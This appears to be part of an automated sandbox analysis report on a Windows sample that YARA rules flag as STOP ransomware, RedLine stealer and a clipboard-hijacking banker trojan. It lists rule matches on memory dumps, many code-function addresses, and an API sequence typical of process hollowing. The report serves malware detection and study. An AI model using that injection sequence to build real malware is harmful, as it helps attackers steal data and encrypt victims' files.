Source: 1.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001A.00000002.2348561919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2348561919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.1848011665.0000000004483000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.3584250955.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.3584250955.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2974032073.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2974032073.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001F.00000002.3583753662.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.3583753662.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000014.00000002.4129162040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.4129162040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.1676862648.000000000459B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2350347697.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2350347697.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1719190222.0000000004544000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1701561007.000000000442E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000013.00000002.2019412066.00000000009BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001D.00000002.2973232719.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2973232719.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.2019239112.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.2019239112.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2974276962.00000000009A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1913660685.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000A.00000002.1913660685.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000010.00000002.1916720423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.1916720423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000017.00000002.2105054288.00000000044CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.1787558327.0000000001ACE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2350442166.0000000000990000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.1914065003.000000000098D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.3584399204.00000000009E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7260, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7376, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7396, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7460, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7488, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7772, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7792, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: SUwX12D2S6.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_05E10110
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 3_2_05DE0110
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_00404F7E 0_2_00404F7E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E13520 0_2_05E13520
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E17520 0_2_05E17520
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E3D7F1 0_2_05E3D7F1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1A79A 0_2_05E1A79A
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1C760 0_2_05E1C760
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1E6E0 0_2_05E1E6E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1A699 0_2_05E1A699
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E5B69F 0_2_05E5B69F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E3D1A4 0_2_05E3D1A4
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E5E141 0_2_05E5E141
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E19120 0_2_05E19120
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E170E0 0_2_05E170E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E130F0 0_2_05E130F0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E200D0 0_2_05E200D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1B0B0 0_2_05E1B0B0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1A026 0_2_05E1A026
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E2F030 0_2_05E2F030
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1B000 0_2_05E1B000
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E17393 0_2_05E17393
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E5E37C 0_2_05E5E37C
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E922C0 0_2_05E922C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E17220 0_2_05E17220
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E15DE7 0_2_05E15DE7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E15DF7 0_2_05E15DF7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E52D1E 0_2_05E52D1E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E44E9F 0_2_05E44E9F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E18E60 0_2_05E18E60
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E159F7 0_2_05E159F7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E189D0 0_2_05E189D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E3E9A3 0_2_05E3E9A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E3F9B0 0_2_05E3F9B0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1A916 0_2_05E1A916
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E318D0 0_2_05E318D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E17880 0_2_05E17880
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1DBE0 0_2_05E1DBE0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E12B60 0_2_05E12B60
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E20B00 0_2_05E20B00
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E17A80 0_2_05E17A80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E1CA10 0_2_05E1CA10
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040D240 1_2_0040D240
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00419F90 1_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00405057 1_2_00405057
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040C070 1_2_0040C070
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042E003 1_2_0042E003
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042F010 1_2_0042F010
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00408030 1_2_00408030
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004070E0 1_2_004070E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00410160 1_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004C8113 1_2_004C8113
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004021C0 1_2_004021C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004C9343 1_2_004C9343
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0044237E 1_2_0044237E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00405447 1_2_00405447
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00405457 1_2_00405457
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004084C0 1_2_004084C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004344FF 1_2_004344FF
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00449506 1_2_00449506
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0043E5A3 1_2_0043E5A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0044B5B1 1_2_0044B5B1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040A660 1_2_0040A660
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00409686 1_2_00409686
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0041E690 1_2_0041E690
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00406740 1_2_00406740
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00402750 1_2_00402750
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040A710 1_2_0040A710
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040F730 1_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00408780 1_2_00408780
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0044D7A1 1_2_0044D7A1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042C804 1_2_0042C804
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00406880 1_2_00406880
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00481920 1_2_00481920
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0044D9DC 1_2_0044D9DC
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_004069F3 1_2_004069F3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00449A71 1_2_00449A71
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00443B40 1_2_00443B40
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00402B80 1_2_00402B80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00406B80 1_2_00406B80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00409CF9 1_2_00409CF9
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0044ACFF 1_2_0044ACFF
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040DD40 1_2_0040DD40
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00427D6C 1_2_00427D6C
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0040BDC0 1_2_0040BDC0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00409DFA 1_2_00409DFA
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_0042CE51 1_2_0042CE51
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00406EE0 1_2_00406EE0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00409F76 1_2_00409F76
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00420F30 1_2_00420F30
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00449FE3 1_2_00449FE3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE3520 3_2_05DE3520
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE7520 3_2_05DE7520
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E0D7F1 3_2_05E0D7F1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEA79A 3_2_05DEA79A
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEC760 3_2_05DEC760
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEE6E0 3_2_05DEE6E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEA699 3_2_05DEA699
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E2B69F 3_2_05E2B69F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E0D1A4 3_2_05E0D1A4
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E2E141 3_2_05E2E141
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE9120 3_2_05DE9120
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DF00D0 3_2_05DF00D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE30F0 3_2_05DE30F0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE70E0 3_2_05DE70E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEB0B0 3_2_05DEB0B0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEB000 3_2_05DEB000
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DFF030 3_2_05DFF030
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEA026 3_2_05DEA026
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE7393 3_2_05DE7393
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E2E37C 3_2_05E2E37C
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E622C0 3_2_05E622C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE7220 3_2_05DE7220
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE5DF7 3_2_05DE5DF7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE5DE7 3_2_05DE5DE7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E22D1E 3_2_05E22D1E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E14E9F 3_2_05E14E9F
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE8E60 3_2_05DE8E60
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE89D0 3_2_05DE89D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE59F7 3_2_05DE59F7
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E0E9A3 3_2_05E0E9A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E0F9B0 3_2_05E0F9B0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEA916 3_2_05DEA916
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E018D0 3_2_05E018D0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE7880 3_2_05DE7880
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DEDBE0 3_2_05DEDBE0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE2B60 3_2_05DE2B60
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DF0B00 3_2_05DF0B00
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DE7A80 3_2_05DE7A80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05DECA10 3_2_05DECA10
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0042E003 4_2_0042E003
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040D240 4_2_0040D240
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0041E690 4_2_0041E690
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040F730 4_2_0040F730
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00481920 4_2_00481920
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00419F90 4_2_00419F90
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D050 4_2_0050D050
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00405057 4_2_00405057
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040C070 4_2_0040C070
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0042F010 4_2_0042F010
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D008 4_2_0050D008
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00408030 4_2_00408030
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D028 4_2_0050D028
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004070E0 4_2_004070E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D090 4_2_0050D090
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D0A8 4_2_0050D0A8
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00410160 4_2_00410160
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004C8113 4_2_004C8113
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004021C0 4_2_004021C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004C9343 4_2_004C9343
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0044237E 4_2_0044237E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00405447 4_2_00405447
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00405457 4_2_00405457
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004084C0 4_2_004084C0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C4E0 4_2_0050C4E0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004344FF 4_2_004344FF
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00449506 4_2_00449506
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0043E5A3 4_2_0043E5A3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0044B5B1 4_2_0044B5B1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040A660 4_2_0040A660
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00409686 4_2_00409686
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00406740 4_2_00406740
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00402750 4_2_00402750
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040A710 4_2_0040A710
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00408780 4_2_00408780
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0044D7A1 4_2_0044D7A1
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0042C804 4_2_0042C804
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00406880 4_2_00406880
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C960 4_2_0050C960
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C928 4_2_0050C928
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0044D9DC 4_2_0044D9DC
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_004069F3 4_2_004069F3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C988 4_2_0050C988
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C9A8 4_2_0050C9A8
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00449A71 4_2_00449A71
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00443B40 4_2_00443B40
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CB78 4_2_0050CB78
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00402B80 4_2_00402B80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00406B80 4_2_00406B80
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00409CF9 4_2_00409CF9
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0044ACFF 4_2_0044ACFF
